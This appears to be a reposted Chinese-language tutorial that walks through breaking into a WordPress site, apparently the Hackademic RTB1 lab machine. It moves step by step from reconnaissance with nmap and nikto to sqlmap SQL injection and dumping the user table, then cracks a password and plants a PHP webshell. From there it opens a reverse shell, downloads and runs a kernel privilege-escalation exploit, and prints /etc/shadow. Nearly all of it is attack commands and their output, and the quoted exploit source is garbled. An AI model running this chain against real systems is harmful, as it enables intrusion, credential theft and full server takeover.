入侵一個網站可以有很多種方法
入侵一個網站可以有很多種方法。本文的目的是展示黑客們常用的掃描和入侵網站的技術。 假設你的站點是:hack-test.com讓我們來ping 一下這個服務器:我們得到了一個IP 地址:173.236.
入侵一個網站可以有很多種方法。本文的目的是展示黑客們常用的掃描和入侵網站的技術。 假設你的站點是:hack-test.com
讓我們來ping 一下這個服務器:
我們得到了一個IP 地址:173.236.138.113 – 這是我們目標服務器的IP 地址。 Sameip.org 可以幫助我們找到其他與這個服務器綁定的域名:
Same IP
26 sites hosted on IP Address 173.236.138.113
有26個站點在這臺服務器上(173.236.138.113)。許多黑客會選擇攻擊在同服務器上的不同站點從而入侵到你的網站。但是出于為了學習目的,我們只選擇入侵你的服務器。 我們需要從你的站點得到一下信息: 1.DNS 記錄(A,NS,TXT,MX 和SOA )
2. 網站服務器的類型(Apache,IIS,Tomcat )
3. 域名的注冊信息(哪個公司擁有這個域名)
4. 你的名字,地址,EMAIL 和電話
5. 你的網站上所運行的腳本類型(PHP,ASP,ASP.NET,JSP,CFM )
6. 服務器的操作系統(tǒng)類型(Unix,Linux,Windows,Solaris )
7. 服務器對外開放的端口(80,443,21, 等)
現在讓我們來尋找網站的DNS 記錄。選擇網站“Who.is ”來實現這個目標。
我們發(fā)現站點上的DNS 記錄有:
讓我們來檢測一下網站服務器的類型:
我們可以看到,網站服務器用的是Apache. 稍后我們會檢測Apache 的版本。
HACK-TEST.COM SITE INFORMATION
IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank: 1 Month: 3,213,968 3 Month: 2,161,753
Page Views per Visit: 1 Month: 2.0 3 Month: 3.7
,接下來我們來尋找一下域名的注冊信息:
我們得到了注冊者以及其他重要的信息。我們可以用Whatweb 來檢測你的站點使用的是什么腳本語言以及操作系統(tǒng)類型和網站服務器的版本。
我們可以看到,網站使用的是WordPress ,操作系統(tǒng)類型是Fedora Linux ,網站服務器版本是Apache 2.2.15,下面我們來檢測一下服務器上打開的端口:
我們使用Nmap :
1. 檢測服務器上運行著哪些服務:
root@bt:/# nmap -sV hack-test.com
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.0013s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)
Service detection performed. Please report any incorrect results at
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
2. 檢測服務器的OS
root@bt:/# nmap -O hack-test.com
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.00079s latency).
,Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22 (Fedora Core 6)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at
Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
服務器只開放了80端口,操作系統(tǒng)是Linux 2.6.22(Fedora Core 6)
現在我們已經得到了所有重要的信息,接下來我們來做一下弱點測試,例如:sql 注入,盲注,LFI,RFI,XSS,CSRF ,等。
我們用Nikto.pl 來獲取信息以及弱點:
root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com
- Nikto v2.1.4
---------------------------------------------------------------------------
Target IP: 192.168.1.2
Target Hostname: hack-test.com
Target Port: 80
Start Time: 2011-12-29 06:50:03
---------------------------------------------------------------------------
Server: Apache/2.2.15 (Fedora)
ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
,Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache
1.3.42 (final release) and 2.0.64 are also current.
Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST OSVDB-3268: /icons/: Directory indexing found.
OSVDB-3233: /icons/README: Apache default file found.
6448 items checked: 1 error(s) and 6 item(s) reported on remote host End Time: 2011-12-29 06:50:37 (34 seconds)
---------------------------------------------------------------------------
1 host(s) tested
也可以使用W3AF, 這個工具可以在Backtrack 5 R1中找到
root@bt:/pentest/web/w3af# ./w3af_gui
Starting w3af, running on:
Python version:
2.6.5 (r265:79063, Apr 16 2010, 13:57:41)
[GCC 4.4.3]
GTK version: 2.20.1
PyGTK version: 2.17.0
w3af - Web Application Attack and Audit Framework
Version: 1.2
Revision: 4605
Author: Andres Riancho and the w3af team.
我們可以插入URL ,選擇full audit選項:
稍等片刻,結果就會出現。
,網站存在著sql 注入漏洞以及其他的漏洞。
讓我們來深入一下sql 注入: http://hack-test.com/Hackademic_RTB1/?cat=d'z"0
這個地址就是注入點,
我們用sqlmap 然后dump 所有入侵所需要用到的數據庫信息
sqlmap –u url
稍等片刻:
選擇“n ”繼續(xù):
網站的sql 注入類型是error-based Mysql數據庫的版本是5.
加上參數“-dbs ”可以找出所有的數據庫:
我們發(fā)現了3個數據庫:
用dump –Dwordpress -tables導出wordpress 數據庫表
我們需要導出“wp_users”表來得到用戶信息以及密碼的hash ,之后我們就可以嘗試著去破解密碼最終登陸到wordpress 的后臺。
使用參數 “-T wp_users –columns “
,找到了22列的數據:
使用參數 -C user_login,user_pass –dump 來導出列。
之后我們就得到了賬號密碼。
接來使用這個網站來把MD5轉換成明文密碼(并不是所有HASH 都能成功轉換) “http://www.onlinehashcrack.com/free-hash-reverse.php“
明文密碼是: q1w2e3
用戶名 “GeorgeMiller ”
讓我們來登陸wordpress 的后臺:
現在我們來試著上傳一個php webshell 用來在這臺服務器上執(zhí)行一些linux 命令 編輯wordpress 的“Textile ”插件 編輯它
插入一個php webshell來代替一個真正的插件。之后點擊上傳,php webshell就被成功上傳到服務器上了。
現在,PHP WEBSHELL就成功運行了?,F在就可以瀏覽網站里所有的文件了,但是我們想得到服務器的root 權限然后入侵其他的站點。
選擇 在php webshell 里的“back-connect “然后連接到我們的ip “192.168.1.6″ 端口 “5555″
在我們點擊連接之前,我們先得在本機上監(jiān)聽一個“5555”的端口
點擊連接,我們會得到這樣一個窗口:
我們來試一下linux 的命令
,id
uid=48(apache) gid=489(apache) groups=489(apache)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
ID 命令用來告訴我們用戶ID 和用戶組 Pwd 命令能告訴我們現在所在的路徑
uname –a 命令用來得到一些信息以及內核版本
好了,我們現在知道服務器的內核版本是2.6.31.5-127.fc12.1686
Ok, now we knew that server kernel version is 2.6.31.5-127.fc12.1686
我們可以在 exploit-db.com 找到針對這個版本的exploit
輸入: “kernel 2.6.31 “
以上結果沒有合適的,因為他們都不是用來提權的。下一個,就是它了!
復制這個連接
在netcat shell里輸入:
wget http://www.exploit-db.com/download/15285 -O roro.c
--2011-12-28 00:48:01-- http://www.exploit-db.com/download/15285
Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/15285/ [following]
--2011-12-28 00:48:02-- http://www.exploit-db.com/download/15285/
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7154 (7.0K) [application/txt]
Saving to: `roro.c'
,0K ...... 100 29.7K=0.2s
我們用wget 命令來獲取exploit-db.com 的exploit ,-O 是重命名文件為:roro.c Note:
Linux 內核的exploits 大多數都是用c 語言開發(fā)的所以我們保存后綴名為.c ,直接瀏覽源文件就可以直接看見源碼:
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RECVPORT 5555
#define SENDPORT 6666
intprep_sock(intport)
{
ints, ret;
structsockaddr_in addr;
s = socket(PF_RDS, SOCK_SEQPACKET, 0);
if(s < 0) {
printf(“[*] Could not open socket.n”);
exit(-1);
}
,www.2cto.com
memset(&addr, 0, sizeof(addr));
All the above lines indicate that this is exploit is written in C language
After we saved our exploit on server, we will compile it to elf format by typing 我們保存exploit 在服務器上之后,我們可以編譯它:
gcc roro.c –o roro
然后執(zhí)行exploit :
./roro
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[ ] Resolved rds_proto_ops to 0xe09f0b20
[ ] Resolved rds_ioctl to 0xe09db06a
[ ] Resolved commit_creds to 0xc044e5f1
[ ] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[ ] Resolved rds_proto_ops to 0xe09f0b20
[ ] Resolved rds_ioctl to 0xe09db06a
[ ] Resolved commit_creds to 0xc044e5f1
[ ] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
Id
這時候我們已經是root 權限了。
uid=0(root) gid=0(root)
,我們可以瀏覽 /etc/shadow file
cat /etc/shadow
root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14557::::::
avahi-autoipd:!!:14557::::::
ntp:!!:14557::::::
dbus:!!:14557::::::
rtkit:!!:14557::::::
nscd:!!:14557::::::
tcpdump:!!:14557::::::
avahi:!!:14557::::::
haldaemon:!!:14557::::::
openvpn:!!:14557::::::
apache:!!:14557::::::
saslauth:!!:14557::::::